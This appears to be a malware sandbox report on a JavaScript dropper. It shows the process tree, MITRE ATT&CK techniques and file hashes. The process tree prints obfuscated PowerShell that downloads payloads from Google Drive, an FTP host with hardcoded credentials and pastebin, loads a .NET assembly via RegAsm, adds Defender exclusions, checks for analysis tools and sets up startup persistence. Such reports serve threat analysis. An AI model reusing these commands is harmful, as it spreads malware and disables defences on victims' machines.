'nAHIAYQ' + [char]66 + 'tAHMAXA' + [char]66 + 'TAHQAYQ' + [char]66 + 'yAHQAdQ' + [char]66 + 'wACcAIAApACAALQ' + [char]66 + 'mAG8Acg' + [char]66 + 'jAGUAIAA7AHAAbw' + [char]66 + '3AGUAcg' + [char]66 + 'zAGgAZQ' + [char]66 + 'sAGwALg' + [char]66 + 'lAHgAZQAgAC0AYw' + [char]66 + 'vAG0AbQ' + [char]66 + 'hAG4AZAAgACcAcw' + [char]66 + 'sAGUAZQ' + [char]66 + 'wACAAMQA4ADAAJwA7ACAAcw' + [char]66 + 'oAHUAdA' + [char]66 + 'kAG8Adw' + [char]66 + 'uAC4AZQ' + [char]66 + '4AGUAIAAvAHIAIAAvAHQAIAAwACAALw' + [char]66 + 'mACAAfQ' + [char]66 + 'lAGwAcw' + [char]66 + 'lACAAew' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ATg' + [char]66 + 'lAHQALg' + [char]66 + 'TAGUAcg' + [char]66 + '2AGkAYw' + [char]66 + 'lAFAAbw' + [char]66 + 'pAG4AdA' + [char]66 + 'NAGEAbg' + [char]66 + 'hAGcAZQ' + [char]66 + 'yAF0AOgA6AFMAZQ' + [char]66 + 'yAHYAZQ' + [char]66 + 'yAEMAZQ' + [char]66 + 'yAHQAaQ' + [char]66 + 'mAGkAYw' + [char]66 + 'hAHQAZQ' + [char]66 + 'WAGEAbA' + [char]66 + 'pAGQAYQ' + [char]66 + '0AGkAbw' + [char]66 + 'uAEMAYQ' + [char]66 + 'sAGwAYg' + [char]66 + 'hAGMAawAgAD0AIA' + [char]66 + '7ACQAdA' + [char]66 + 'yAHUAZQ' + [char]66 + '9ACAAOw' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ATg' + [char]66 + 'lAHQALg' + [char]66 + 'TAGUAcg' + [char]66 + '2AGkAYw' + [char]66 + 'lAFAAbw' + [char]66 + 'pAG4AdA' + [char]66 + 'NAGEAbg' + [char]66 + 'hAGcAZQ' + [char]66 + 'yAF0AOgA6AFMAZQ' + [char]66 + 'jAHUAcg' + [char]66 + 'pAHQAeQ' + [char]66 + 'QAHIAbw' + [char]66 + '0AG8AYw' + [char]66 + 'vAGwAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAE4AZQ' + [char]66 + '0AC4AUw' + [char]66 + 'lAGMAdQ' + [char]66 + 'yAGkAdA' + [char]66 + '5AFAAcg' + [char]66 + 'vAHQAbw' + [char]66 + 'jAG8AbA' + [char]66 + 'UAHkAcA' + [char]66 + 'lAF0AOgA6AFQAbA' + [char]66 + 'zADEAMgAgADsAaQ' + [char]66 + 'mACgAKA' + [char]66 + 'nAGUAdAAtAHAAcg' + [char]66 + 'vAGMAZQ' + [char]66 + 'zAHMAIAAnAFcAaQ' + [char]66 + 'yAGUAcw' + [char]66 + 'oAGEAcg' + [char]66 + 'rACcALAAnAGEAcA' + [char]66 + 'hAHQAZQ' + [char]66 + 'EAE4AUwAnACwAJw' + [char]66 + 'hAG4AYQ' + [char]66 + 'sAHkAeg' + [char]66 + 'lACcAIAAtAGUAYQAgAFMAaQ' + [char]66 + 'sAGUAbg' + [char]66 + '0AGwAeQ' + [char]66 + 'DAG8Abg' + [char]66 + '0AGkAbg' + [char]66 + '1AGUAKQAgAC0AZQ' + [char]66 + 'xACAAJA' + [char]66 + 'OAHUAbA' + [char]66 + 'sACkAewAgAA0ACgAgACAAIAAgACAAIAAgAA0ACg' + [char]66 + '9AA0ACgANAAoAZQ' + [char]66 + 'sAHMAZQ' + [char]66 + '7ACAADQAKAFIAZQ' + [char]66 + 'zAHQAYQ' + [char]66 + 'yAHQALQ' + [char]66 + 'DAG8AbQ' + [char]66 + 'wAHUAdA' + [char]66 + 'lAHIAIAAtAGYAbw' + [char]66 + 'yAGMAZQAgADsADQAKACAAIAAgACAAIAAgAGUAeA' + [char]66 + 'pAHQAIAA7AA0ACgAgAH0AIAA7ACQAag' + [char]66 + 'sAGMAcQ' + [char]66 + 'qACAAPQAgACgAJw' + [char]66 + 'mAHQAcAA6AC8ALw' + [char]66 + 'kAGUAcw' + [char]66 + 'jAGsAdg' + [char]66 + 'iAHIAYQ' + [char]66 + '0ADEAQA' + [char]66 + 'mAHQAcAAuAGQAZQ' + [char]66 + 'zAGMAaw' + [char]66 + '2AGIAcg' + [char]66 + 'hAHQALg' + [char]66 + 'jAG8AbQAuAGIAcgAvAFUAcA' + [char]66 + 'jAHIAeQ' + [char]66 + 'wAHQAZQ' + [char]66 + 'yACcAIAArACAAJwAvADAAMgAvAEQATA' + [char]66 + 'MADAAMQAuAHQAeA' + [char]66 + '0ACcAIAApADsAJA' + [char]66 + 'JAGUAcA' + [char]66 + 'HAFEAIAA9ACAAKAAgAFsAUw' + [char]66 + '5AHMAdA' + [char]66 + 'lAG0ALg' + [char]66 + 'JAE8ALg' + [char]66 + 'QAGEAdA' + [char]66 + 'oAF0AOgA6AEcAZQ' + [char]66 + '0AFQAZQ' + [char]66 + 'tAHAAUA' + [char]66 + 'hAHQAaAAoACkAIAArACAAJw' + [char]66 + 'kAGwAbAAwADEALg' + [char]66 + '0AHgAdAAnACkAOwAkAE8Aag' + [char]66 + 'yAFIAUAAgAD0AIAAoAC0Aag' + [char]66 + 'vAGkAbgAgAFsAYw' + [char]66 + 'oAGEAcg' + [char]66 + 'bAF0AXQAoADEAMAAwACwAMQAwADEALAAxADEANQAsADkAOQAsADEAMAA3ACwAMQAxADgALAA5ADgALAAxADEANAAsADkANwAsADEAMQA2ACwANAA5ACkAKQAgADsAJA' + [char]66 + 'sAGwAbA' + [char]66 + 'HAHEAIAA9ACAAKAAtAGoAbw' + [char]66 + 'pAG4AIA' + [char]66 + 'bAGMAaA' + [char]66 + 'hAHIAWw' + [char]66 + 'dAF0AKAAxADAAMgAsACAAOAA5ACwAIAAxADEANwAsACAAMQAwADAALAAgADgAOQAsACAANAA5ACwAIAA1ADMALAAgADUANQAsACAANQA2ACwAIAA2ADQALAAgADYANAAsACAANgA0ACwAIAA2ADQALAAgADYANAAsACAANgA0ACAAKQApACAAOwAkAHcAZQ' + [char]66 + 'iAEMAbA' + [char]66 + 'pAGUAbg' + [char]66 + '0ACAAPQAgAE4AZQ' + [char]66 + '3AC0ATw' + [char]66 + 'iAGoAZQ' + [char]66 + 'jAHQAIA' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAE4AZQ' + [char]66 + '0AC4AVw' + [char]66 + 'lAGIAQw' + [char]66 + 'sAGkAZQ' + [char]66 + 'uAHQAIAA7ACQAdw' + [char]66 + 'lAGIAQw' + [char]66 + 'sAGkAZQ' + [char]66 + 'uAHQALg' + [char]66 + 'DAHIAZQ' + [char]66 + 'kAGUAbg' + [char]66 + '0AGkAYQ' + [char]66 + 'sAHMAIAA9ACAAbg' + [char]66 + 'lAHcALQ' + [char]66 + 'vAGIAag' + [char]66 + 'lAGMAdAAgAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ATg' + [char]66 + 'lAHQALg' + [char]66 + 'OAGUAdA' + [char]66 + '3AG8Acg' + [char]66 + 'rAEMAcg' + [char]66 + 'lAGQAZQ' + [char]66 + 'uAHQAaQ' + [char]66 + 'hAGwAKAAkAE8Aag' + [char]66 + 'yAFIAUAAsACAAJA' + [char]66 + 'sAGwAbA' + [char]66 + 'HAHEAKQAgADsAJA' + [char]66 + 'SAFYAVQ' + [char]66 + 'YAHYAIAA9ACAAJA' + [char]66 + '3AGUAYg' + [char]66 + 'DAGwAaQ' + [char]66 + 'lAG4AdAAuAEQAbw' + [char]66 + '3AG4AbA' + [char]66 + 'vAGEAZA' + [char]66 + 'TAHQAcg' + [char]66 + 'pAG4AZwAoACAAJA' + [char]66 + 'qAGwAYw' + [char]66 + 'xAGoAIAApACAAOwAkAFIAVg' + [char]66 + 'VAFgAdgAgAHwAIA' + [char]66 + 'PAHUAdAAtAEYAaQ' + [char]66 + 'sAGUAIAAtAEYAaQ' + [char]66 + 'sAGUAUA' + [char]66 + 'hAHQAaAAgACQASQ' + [char]66 + 'lAHAARw' + [char]66 + 'RACAALQ' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAIAAnAFUAVA' + [char]66 + 'GADgAJwAgAC0AZg' + [char]66 + 'vAHIAYw' + [char]66 + 'lACAAOwAkAFMAVA' + [char]66 + 'mAEcAbAAgAD0AIAAoACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAEkATwAuAFAAYQ' + [char]66 + '0AGgAXQA6ADoARw' + [char]66 + 'lAHQAVA' + [char]66 + 'lAG0AcA' + [char]66 + 'QAGEAdA' + [char]66 + 'oACgAKQAgACsAIAAnAGQAbA' + [char]66 + 'sADAAMgAuAHQAeA' + [char]66 + '0ACcAKQAgADsAJA' + [char]66 + 'QAGgAcg' + [char]66 + 'sAE4AIAA9ACAATg' + [char]66 + 'lAHcALQ' + [char]66 + 'PAGIAag' + [char]66 + 'lAGMAdAAgAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ATg' + [char]66 + 'lAHQALg' + [char]66 + 'XAGUAYg' + [char]66 + 'DAGwAaQ' + [char]66 + 'lAG4AdAAgADsAJA' + [char]66 + 'QAGgAcg' + [char]66 + 'sAE4ALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAFQAZQ' + [char]66 + '4AHQALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAXQA6ADoAVQ' + [char]66 + 'UAEYAOAAgADsAJA' + [char]66 + 'EAEgAeg' + [char]66 + 'VAEEAIAAgAD0AIAAoACAARw' + [char]66 + 'lAHQALQ' + [char]66 + 'DAG8Abg' + [char]66 + '0AGUAbg' + [char]66 + '0ACAALQ' + [char]66 + 'QAGEAdA' + [char]66 + 'oACAAJA' + [char]66 + 'JAGUAcA' + [char]66 + 'HAFEAIAApACAAOwAkAHUAVA' + [char]66 + 'sAEgAegAgAD0AIAAkAFAAaA' + [char]66 + 'yAGwATgAuAEQAbw' + [char]66 + '3AG4AbA' + [char]66 + 'vAGEAZA' + [char]66 + 'TAHQAcg' + [char]66 + 'pAG4AZwAoACAAJA' + [char]66 + 'EAEgAeg' + [char]66 + 'VAEEAIAApACAAOwAkAHUAVA' + [char]66 + 'sAEgAegAgAHwAIA' + [char]66 + 'PAHUAdAAtAEYAaQ' + [char]66 + 'sAGUAIAAtAEYAaQ' + [char]66 + 'sAGUAUA' + [char]66 + 'hAHQAaAAgACQAUw' + [char]66 + 'UAGYARw' + [char]66 + 'sACAALQ' + [char]66 + 'mAG8Acg' + [char]66 + 'jAGUAIAA7ACQATQ' + [char]66 + 'PAEQAUg' + [char]66 + 'nACAAPQAgACcAJA' + [char]66 + 'yAHkAYQ' + [char]66 + 'lAEcAIAA9ACAAKA' + [char]66 + 'HAGUAdAAtAEMAbw' + [char]66 + 'uAHQAZQ' + [char]66 + 'uAHQAIAAtAFAAYQ' + [char]66 + '0AGgAIAAnACAAKwAgACQAUw' + [char]66 + 'UAGYARw' + [char]66 + 'sACAAKwAgACcAIAAtAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZwAgAFUAVA' + [char]66 + 'GADgAKQA7ACcAIAA7ACQATQ' + [char]66 + 'PAEQAUg' + [char]66 + 'nACAAKwA9ACAAJw' + [char]66 + 'bAEIAeQ' + [char]66 + '0AGUAWw' + [char]66 + 'dAF0AIAAkAEYAeQ' + [char]66 + 'mAGQAegAgAD0AIA' + [char]66 + 'bAHMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4AQw' + [char]66 + 'vAG4Adg' + [char]66 + 'lAHIAdA' + [char]66 + 'dADoAOg' + [char]66 + 'GAHIAbw' + [char]66 + 'tAEIAYQ' + [char]66 + 'zAGUANgA0AFMAdA' + [char]66 + 'yAGkAbg' + [char]66 + 'nACgAIAAkAHIAeQ' + [char]66 + 'hAGUARwAuAHIAZQ' + [char]66 + 'wAGwAYQ' + [char]66 + 'jAGUAKAAnACcAkyE6AJMhJwAnACwAJwAnAEEAJwAnACkAIAApACAAOwAnACAAOwAkAE0ATw' + [char]66 + 'EAFIAZwAgACsAPQAgACcAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAEEAcA' + [char]66 + 'wAEQAbw' + [char]66 + 'tAGEAaQ' + [char]66 + 'uAF0AOgA6AEMAdQ' + [char]66 + 'yAHIAZQ' + [char]66 + 'uAHQARA' + [char]66 + 'vAG0AYQ' + [char]66 + 'pAG4ALg' + [char]66 + 'MAG8AYQ' + [char]66 + 'kACgAIAAkAEYAeQ' + [char]66 + 'mAGQAegAgACkALgAnACAAOwAkAE0ATw' + [char]66 + 'EAFIAZwAgACsAPQAgACcARw' + [char]66 + 'lAHQAVA' + [char]66 + '5AHAAZQAoACAAJwAnAEMAbA' + [char]66 + 'hAHMAcw' + [char]66 + 'MAGkAYg' + [char]66 + 'yAGEAcg' + [char]66 + '5ADMALg' + [char]66 + 'DAGwAYQ' + [char]66 + 'zAHMAMQAnACcAIAApAC4ARw' + [char]66 + 'lAHQATQAnACAAOwAkAE0ATw' + [char]66 + 'EAFIAZwAgACsAPQAgACcAZQ' + [char]66 + '0AGgAbw' + [char]66 + 'kACgAIAAnACcAcA' + [char]66 + 'yAEYAVg' + [char]66 + 'JACcAJwAgACkALg' + [char]66 + 'JAG4Adg' + [char]66 + 'vAGsAZQAoACAAJA' + [char]66 + 'uAHUAbA' + [char]66 + 'sACAALAAgAFsAbw' + [char]66 + 'iAGoAZQ' + [char]66 + 'jAHQAWw' + [char]66 + 'dAF0AIAAoACAAJwAnAGsANw' + [char]66 + 'OAG4ATQ' + [char]66 + 'DAFAAQwAvAHcAYQ' + [char]66 + 'yAC8AbQ' + [char]66 + 'vAGMALg' + [char]66 + 'uAGkAYg' + [char]66 + 'lAHQAcw' + [char]66 + 'hAHAALwAvADoAcw' + [char]66 + 'wAHQAdA' + [char]66 + 'oACcAJwAgACwAIAAnACcAJQ' + [char]66 + 'EAEMAUA' + [char]66 + 'KAFUAJQAnACcAIAAsACAAIAAnACcARAAgAEQARA' + [char]66 + 'SAGUAZw' + [char]66 + '' + [char]66 + 'AHMAbQAnACcAIAAgACkAIAApADsAJwA7ACQAVg' + [char]66 + 'CAFcAVw' + [char]66 + '6ACAAPQAgACgAIA' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ASQ' + [char]66 + 'PAC4AUA' + [char]66 + 'hAHQAaA' + [char]66 + 'dADoAOg' + [char]66 + 'HAGUAdA' + [char]66 + 'UAGUAbQ' + [char]66 + 'wAFAAYQ' + [char]66 + '0AGgAKAApACAAKwAgACcAZA' + [char]66 + 'sAGwAMAAzAC4AcA' + [char]66 + 'zADEAJwApACAAOwAkAE0ATw' + [char]66 + 'EAFIAZwAgAHwAIA' + [char]66 + 'PAHUAdAAtAEYAaQ' + [char]66 + 'sAGUAIAAtAEYAaQ' + [char]66 + 'sAGUAUA' + [char]66 + 'hAHQAaAAgACQAVg' + [char]66 + 'CAFcAVw' + [char]66 + '6ACAAIAAtAGYAbw' + [char]66 + 'yAGMAZQAgADsAcA' + [char]66 + 'vAHcAZQ' + [char]66 + 'yAHMAaA' + [char]66 + 'lAGwAbAAgAC0ARQ' + [char]66 + '4AGUAYw' + [char]66 + '1AHQAaQ' + [char]66 + 'vAG4AUA' + [char]66 + 'vAGwAaQ' + [char]66 + 'jAHkAIA' + [char]66 + 'CAHkAcA' + [char]66 + 'hAHMAcwAgAC0ARg' + [char]66 + 'pAGwAZQAgACQAVg' + [char]66 + 'CAFcAVw' + [char]66 + '6ACAAOw' + [char]66 + '9ADsA';$jPhaA = $jPhaA.replace('革','B') ;$jPhaA = [System.Convert]::FromBase64String( $jPhaA ) ;;;$jPhaA = [System.Text.Encoding]::Unicode.GetString( $jPhaA ) ;$jPhaA = $jPhaA.replace('%DCPJU%','C:\Users\Admin\Downloads\BON_DE_REGLEMENT\DEVIS_VALIDE.js') ;powershell $jPhaA
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2044
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$vxbCx = $host.Version.Major.Equals(2);If ( $vxbCx ) {$HzOMj = [System.IO.Path]::GetTempPath();del ($HzOMj + '\Upwin.msu');$jkwjz = 'https://drive.google.com/uc?export=download&id=';$PiUQb = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ( $PiUQb ) {$jkwjz = ($jkwjz + '1p2brjH-QNY5brwiLZuYsW-R59UwjdSEV') ;}else {$jkwjz = ($jkwjz + '1aaHy4-BL1jpAnjhteg88KMZ7cu81Z05w') ;};$cxpfd = ( New-Object Net.WebClient ) ;$cxpfd.Encoding = [System.Text.Encoding]::UTF8 ;$cxpfd.DownloadFile($jkwjz, ($HzOMj + '\Upwin.msu') ) ;$tpWkF = ( 'C:\Users\' + [Environment]::UserName );HhXHB = ( $HzOMj + '\Upwin.msu' ) ; powershell.exe wusa.exe HhXHB /quiet /norestart ; Copy-Item 'C:\Users\Admin\Downloads\BON_DE_REGLEMENT\DEVIS_VALIDE.js' -Destination ( $tpWkF + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit ; } ;$jlcqj = ('ftp://[email protected]/Upcrypter' + '/02/DLL01.txt' );$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$OjrRP = (-join [char[]](100,101,115,99,107,118,98,114,97,116,49)) ;$lllGq = (-join [char[]](102, 89, 117, 100, 89, 49, 53, 55, 56, 64, 64, 64, 64, 64, 64 )) ;$webClient = New-Object System.Net.WebClient ;$webClient.Credentials = new-object System.Net.NetworkCredential($OjrRP, $lllGq) ;$RVUXv = $webClient.DownloadString( $jlcqj ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ' + $STfGl + ' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''↓:↓'',''A'') ) ;' ;$MODRg += '[System.AppDomain]::CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$MODRg += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''k7NnMCPC/war/moc.nibetsap//:sptth'' , ''C:\Users\Admin\Downloads\BON_DE_REGLEMENT\DEVIS_VALIDE.js'' , ''D DDRegAsm'' ) );';$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1') ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;};"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2952
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\Temp\dll03.ps1
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4056
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5828
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:8
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c mkdir "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\"
        5⤵
        
        PID:5840
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\qnqth.ps1'"
        5⤵
        Hide Artifacts: Hidden Window
        
        PID:6008
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\qnqth.ps1'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1176
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\qnqth.ps1"
        7⤵
        Command and Scripting Interpreter: PowerShell
        Adds Run key to start application
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1100
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\xcfcc.ps1'"
        5⤵
        Hide Artifacts: Hidden Window
        
        PID:4908
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\xcfcc.ps1'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1652
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\xcfcc.ps1"
        7⤵
        Command and Scripting Interpreter: PowerShell
        Adds Run key to start application
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:736
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\kfazm.ps1"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:224
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Start-Sleep -Seconds 1 ; powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\pesister.ps1"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5736
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\pesister.ps1
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5884
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\xcfcc.ps1"
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5468
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: AddClipboardFormatListener
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:5920
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c del "C:\Users\Admin\Downloads\BON_DE_REGLEMENT\DEVIS_VALIDE.js"
        5⤵
        
        PID:1292

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Hide Artifacts

T1564

Hidden Window

T1564.003

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\kfazm.ps1

Filesize
225KB

MD5
3d5278d22f6024c3f8751fa20b18e525

SHA1
1eb34d0840676ac315a6f13cd6d62596503b8306

SHA256
a1e5388762d0111b8eae1db6e119db5c0c664d07dd2e1a912c6ceee38a64ce40

SHA512
3da2410187eae4e824276914f8a4397dbec7543a1037dee4ccc41abaef0e1e6f204fe141d64670678607ca2c50bd5fe7cd65ce8121a118619ff345c76f3d452c

Download Submit
C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\qnqth.ps1

Filesize
426B

MD5
6bb893914449510f4eaa4548f22d036f

SHA1
68a5d9beff8dccc16e48fc1d1378b0552bd9b45d

SHA256
68b694f0ba0974f6314d41dc4a1b1ef06d964d4f43366eb360206c3dac3ebf5e

SHA512
c938d026aa15baf1e9b019b8dd8fd2ae2b49ccc1a79286de3993b67ca7fd4ba49995f66d7899d9044ea0db8d341e23070b0950fbe575d2ff3a5b64f425202c9d

Download Submit
C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\xcfcc.ps1

Filesize
431B

MD5
47f16ea58eedb84fc8b97b7149cb4918

SHA1
35e207724934c1302f35a140f7ff37ef85b1b369

SHA256
9287db766a19ab57fb64f34f0453bb4968e60b8f50eb2debe20224b80f2df183

SHA512
6b8ce038b0e42506c4c867d0a8cef7e4271d4b963cdfd410c9ab1f00c6c8cc12dd1d4f11f0998c8d1d0bf2bb5befc3efc622037f89b8b644611c8cde46a43ac6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
